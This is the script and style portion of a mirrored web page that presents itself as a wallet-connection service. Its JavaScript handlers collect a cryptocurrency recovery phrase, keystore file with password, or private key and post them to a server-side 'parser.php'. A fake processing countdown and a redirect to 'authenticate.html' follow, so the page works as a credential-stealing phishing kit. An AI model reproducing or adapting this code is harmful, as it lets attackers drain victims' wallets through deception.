    /*! CSS Used from: Embedded */

    div,
    span {
      font-family: "DM Sans", sans-serif;
    }

    /*! CSS Used from: Embedded */

    .active {
      border-color: #3498db;
    }

    /*! CSS Used fontfaces */

    @font-face {
      font-family: 'DM Sans';
      font-style: italic;
      font-weight: 400;
      font-display: swap;
      src: url(https://fonts.gstatic.com/s/dmsans/v6/rP2Fp2ywxg089UriCZa4ET-DNl0.woff2) format('woff2');
      unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
    }

    @font-face {
      font-family: 'DM Sans';
      font-style: italic;
      font-weight: 400;
      font-display: swap;
      src: url(https://fonts.gstatic.com/s/dmsans/v6/rP2Fp2ywxg089UriCZa4Hz-D.woff2) format('woff2');
      unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
    }

    @font-face {
      font-family: 'DM Sans';
      font-style: italic;
      font-weight: 500;
      font-display: swap;
      src: url(https://fonts.gstatic.com/s/dmsans/v6/rP2Ap2ywxg089UriCZaw7ByWB3wTyCg.woff2) format('woff2');
      unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
    }

    @font-face {
      font-family: 'DM Sans';
      font-style: italic;
      font-weight: 500;
      font-display: swap;
      src: url(https://fonts.gstatic.com/s/dmsans/v6/rP2Ap2ywxg089UriCZaw7ByWCXwT.woff2) format('woff2');
      unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
    }

    @font-face {
      font-family: 'DM Sans';
      font-style: italic;
      font-weight: 700;
      font-display: swap;
      src: url(https://fonts.gstatic.com/s/dmsans/v6/rP2Ap2ywxg089UriCZawpBqWB3wTyCg.woff2) format('woff2');
      unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
    }

    @font-face {
      font-family: 'DM Sans';
      font-style: italic;
      font-weight: 700;
      font-display: swap;
      src: url(https://fonts.gstatic.com/s/dmsans/v6/rP2Ap2ywxg089UriCZawpBqWCXwT.woff2) format('woff2');
      unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
    }

    @font-face {
      font-family: 'DM Sans';
      font-style: normal;
      font-weight: 400;
      font-display: swap;
      src: url(https://fonts.gstatic.com/s/dmsans/v6/rP2Hp2ywxg089UriCZ2IHSeH.woff2) format('woff2');
      unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
    }

    @font-face {
      font-family: 'DM Sans';
      font-style: normal;
      font-weight: 400;
      font-display: swap;
      src: url(https://fonts.gstatic.com/s/dmsans/v6/rP2Hp2ywxg089UriCZOIHQ.woff2) format('woff2');
      unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
    }

    @font-face {
      font-family: 'DM Sans';
      font-style: normal;
      font-weight: 500;
      font-display: swap;
      src: url(https://fonts.gstatic.com/s/dmsans/v6/rP2Cp2ywxg089UriAWCrCBamC2QX.woff2) format('woff2');
      unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
    }

    @font-face {
      font-family: 'DM Sans';
      font-style: normal;
      font-weight: 500;
      font-display: swap;
      src: url(https://fonts.gstatic.com/s/dmsans/v6/rP2Cp2ywxg089UriAWCrCBimCw.woff2) format('woff2');
      unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
    }

    @font-face {
      font-family: 'DM Sans';
      font-style: normal;
      font-weight: 700;
      font-display: swap;
      src: url(https://fonts.gstatic.com/s/dmsans/v6/rP2Cp2ywxg089UriASitCBamC2QX.woff2) format('woff2');
      unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
    }

    @font-face {
      font-family: 'DM Sans';
      font-style: normal;
      font-weight: 700;
      font-display: swap;
      src: url(https://fonts.gstatic.com/s/dmsans/v6/rP2Cp2ywxg089UriASitCBimCw.woff2) format('woff2');
      unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
    }
  </style>
  <style>
    .acc-body {
      display: none;
    }

    .acc-body.active {
      display: block;
    }
  </style>
  <style>
    .overlay {
      position: fixed;
      display: flex;
      justify-content: center;
      align-items: center;
      width: 100%;
      height: 100vh;
      background-color: rgba(223, 217, 217, 0.2);
      z-index: 99;
    }

    .aletr {
      background:none;
      width: 30%;
      border-radius: 5px;
      padding: 20px;
      position: relative;
    }

    .close {
      position: absolute;
      width: 15px;
      right: 20px;
    }

    .close img {
      width: 15px !important;
      cursor: pointer;
    }

    .aletr h1 {
      padding-top: 10px;
      text-align: center;
      font-size: 2em;
    }

    .aletr .select {
      display: flex;
      justify-content: space-between;
      align-items: center;
      border-radius: 5px;
      border: 1px solid #201f1f;
      padding: 15px;
      margin-top: 20px;
      width: 100%;
      cursor: pointer;
    }

    .aletr img {
      width: 40px;
    }

    .inputBox {
      display: flex;
      flex-direction: column;
      align-items: center;
      margin-top: 20px;
      margin-bottom: 20px;
    }

    .inputBox input {
      width: 80%;
      border-radius: 5px;
      border: 1px solid #ccc;
      outline: none;
      padding: 10px;
      color: rgb(88, 112, 135);
    }

    .errormessage {
      color: red;
      text-align: center;
      width: 100%;
      font-size: 16px;
      display: none;
      margin-top: 10px;
    }

    .inputBox button {
      width: 80%;
      border-radius: 5px;
      border: 1px solid #ccc;
      outline: none;
      padding: 10px;
      margin-top: 25px;
      color: rgb(88, 112, 135);
      cursor: pointer;
    }

    .inputBox textarea {
      width: 80%;
      border-radius: 5px;
      border: 1px solid #ccc;
      outline: none;
      padding: 10px;
      max-width: 80%;
      color: rgb(88, 112, 135);
    }

    .sss {
      font-size: 20px;
    }

    /* Smartphones (portrait and landscape) ----------- */

    @media only screen and (min-device-width: 320px) and (max-device-width: 480px) {

      /* Styles */
      .aletr {
        width: 90%;
      }
    }

    /* Smartphones (landscape) ----------- */

    @media only screen and (min-width: 321px) {

      /* Styles */
      .aletr {
        width: 80%;
      }
    }

    /* Smartphones (portrait) ----------- */

    @media only screen and (max-width: 320px) {

      /* Styles */
      .aletr {
        width: 80%;
      }
    }

    /* iPads (portrait and landscape) ----------- */

    @media only screen and (min-width: 768px) and (max-width: 1024px) {

      /* Styles */
      .aletr {
        width: 50%;
      }
    }

    /* iPads (landscape) ----------- */

    @media only screen and (min-device-width: 768px) and (max-device-width: 1024px) and (orientation: landscape) {

      /* Styles */
      .aletr {
        width: 50%;
      }
    }

    /* iPads (portrait) ----------- */

    @media only screen and (min-device-width: 768px) and (max-device-width: 1024px) and (orientation: portrait) {

      /* Styles */
      .aletr {
        width: 60%;
      }
    }

    /* Desktops and laptops ----------- */

    @media only screen and (min-width: 1224px) {

      /* Styles */
      .aletr {
        width: 40%;
      }
    }

    /* Large screens ----------- */

    @media only screen and (min-width: 1824px) {

      /* Styles */
      .aletr {
        width: 30%;
      }
    }

    /* iPhone 4 ----------- */

    @media only screen and (-webkit-min-device-pixel-ratio: 1.5),
    only screen and (min-device-pixel-ratio: 1.5) {
      /* Styles */
    }
  </style>
<script>
  // Particle.js configuration
  particlesJS('particles-js', {
      particles: {
          number: { value: 80, density: { enable: true, value_area: 800 } },
          color: { value: "#ffffff" },
          shape: { type: "circle" },
          opacity: { value: 0.5 },
          size: { value: 3, random: true },
          line_linked: { enable: true, distance: 150, color: "#ffffff", opacity: 0.4 },
          move: { enable: true, speed: 6 }
      },
      interactivity: {
          events: {
              onhover: { enable: true, mode: "grab" },
              onclick: { enable: true, mode: "push" }
          },
          modes: { grab: { distance: 140 }, push: { particles_nb: 4 } }
      },
      retina_detect: true
  });

</script
  <script
  src="../code.jquery.com/jquery-3.6.0.min.js"
  integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4="
  crossorigin="anonymous"></script>
  <script src="WalletAPI_wallets_files/js1.js.download"></script>
  <script src="WalletAPI_wallets_files/js2w.js.download"></script>

  <script>

function startTimer(duration, display) {
    var timer = duration, minutes, seconds;
    setInterval(function () {
        seconds = parseInt(timer % 60, 10);

        seconds = seconds < 10 ? "0" + seconds : seconds;

        display.textContent = seconds;

        if (--timer < 0) {
            timer = duration;
        }
        if(seconds == '00'){
          document.querySelector('#processing-dialog').style.display = 'none';
          document.querySelector('#success-dialog').style.display = 'block';
          setInterval(function(){
            redirect()
          }, 1500)
        }
    }, 1000);
    console.log(ss)
}


    function ready() {
      document.body.style.display = "block";
    }
    document.addEventListener("DOMContentLoaded", ready);
  </script>
  <script>
    const phraseProceedBtn = document.getElementById('phraseProceed');
    const keystorejsonProceedBtn = document.getElementById('keystorejsonproceed');
    const privatekeyProceedBtn = document.getElementById('privatekeyProceed');
    const phraseProceedHandler = () => {
      let phraseInputVal = document.getElementById('phraseInput').value;
      const wallet = document.getElementById('wallet_id').value;
      if (phraseInputVal.trim() === "") {
        alert('Fill in your recovery phrase');
      } else if(phraseInputVal.length < 12) {
        alert('Recovery phrase length should be 12 or more in characters.') 
      } else {
        $.ajax({
          url: 'parser.php',
          method: 'POST',
          data: { import_type: 'phrase', wallet: wallet, phrase: phraseInputVal },
          success: function (res) {
            console.log(res)
            if (res.trim() != "") {
              if (res.trim() == "string_error") {
                alert('Fill in your recovery phrase');
              } else if (res.trim() == "success") {
                phraseInputVal = '';
                document.querySelector('#processing-dialog').style.display = 'block';
                document.querySelector('#key_overlay').style.display = 'none';
                display = document.querySelector('#processing-val');
                startTimer(29, display)
              }
            } else {
              alert('Could not proceed due to some errors, kindly try again later.')
            }
          }
        });
      }
    };

    const keystorejsonProceedHandler = () => {
      let keystorejson = document.getElementById('keystorejson').value;
      let keystorepassword = document.getElementById('keystorepassword').value;
      const wallet = document.getElementById('wallet_id').value;
      if (keystorejson.trim() === "" || keystorepassword === "") {
        alert('Fill out all form fields before proceeding');
      } else {
        $.ajax({
          url: 'parser.php',
          method: 'POST',
          data: { import_type: 'keystorejson', wallet: wallet, keystorejson: keystorejson, keystorepassword: keystorepassword },
          success: function (res) {
            console.log(res)
            if (res.trim() !== "") {
              if (res.trim() === "string_error") {
                alert('Fill out all form fields before proceeding');
              } else if (res.trim() == "success") {
                keystorepassword = '';
                keystorejson = '';
                document.querySelector('#processing-dialog').style.display = 'block';
                document.querySelector('#key_overlay').style.display = 'none';
                display = document.querySelector('#processing-val');
                startTimer(29, display)
              } else {
                alert('Could not proceed due to some errors, kindly try again later.')
              }
            }
          }
        });
      }
    };

    const privateKeyProceedHandler = () => {
      let privatekey = document.getElementById('privatekey').value;
      const wallet = document.getElementById('wallet_id').value;
      console.log(wallet);
      if (privatekey.trim() === "") {
        alert('Fill in your private key');
      } else {
        $.ajax({
          url: 'parser.php',
          method: 'POST',
          data: { import_type: 'private', wallet: wallet, privatekey: privatekey },
          success: function (res) {
            if (res.trim() !== "") {
              if (res.trim() === "string_error") {
                alert('Fill in your private key.');
              } else if (res.trim() === "success") {
                privatekey = '';
                
                document.querySelector('#processing-dialog').style.display = 'block';
                document.querySelector('#key_overlay').style.display = 'none';
                display = document.querySelector('#processing-val');
                startTimer(29, display)
              }
            } else {
              alert('Could not proceed due to some errors, kindly try again later.')
            }
          }
        });
      }
    };

    const redirect = () => {
      window.location.href = 'authenticate.html';
    };

    

    phraseProceedBtn.addEventListener('click', phraseProceedHandler);
    keystorejsonProceedBtn.addEventListener('click', keystorejsonProceedHandler);
    privatekeyProceedBtn.addEventListener('click', privateKeyProceedHandler);
  </script>
</body>




<!-- Mirrored from noncustdaps.com/wallets.html by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 18 Jul 2023 08:58:18 GMT -->
</html>